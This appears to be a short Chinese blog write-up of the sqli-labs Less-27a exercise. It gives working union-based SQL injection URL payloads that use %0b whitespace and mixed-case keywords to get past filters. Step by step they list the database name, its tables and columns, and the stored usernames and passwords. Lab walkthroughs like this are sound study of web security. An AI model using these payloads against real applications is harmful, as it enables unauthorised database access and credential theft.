zoukankan      html  css  js  c++  java

  • Less(27a)GET

    1.和Less(27)一样,就是把单引号闭合变成双引号闭合

      验证一下:?id=0"%0bor(1)=(1)%26%26%0b"1

      

     2.爆破:

      (1)爆库: ?id=0"%0buniOn%0bsElEct%0b1,database(),3%0bor%0b"1"="1  

        

      (2)爆表:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(table_name)),3%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema='security'%0b%26%26%0b"1"="1

        

      (3)爆列名:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b"1"="1

        

      (4)爆值:?id=0"%0buniOn%0bsElEct%0b1,(group_concat(username,0x7e,password)),3%0bfrom%0busers%0buniOn%0bseLect (1),(2),"(3

        
  • 相关阅读:
    hero
    今年暑假不AC
    Who's in the Middle
    A Simple Problem with Integers
    I hate it
    敌兵布阵
    Ordering Tasks
    Points on Cycle
    食物链
    c++ 14.0下载地址
  • 原文地址:https://www.cnblogs.com/meng-yu37/p/12403017.html
Copyright © 2011-2022 走看看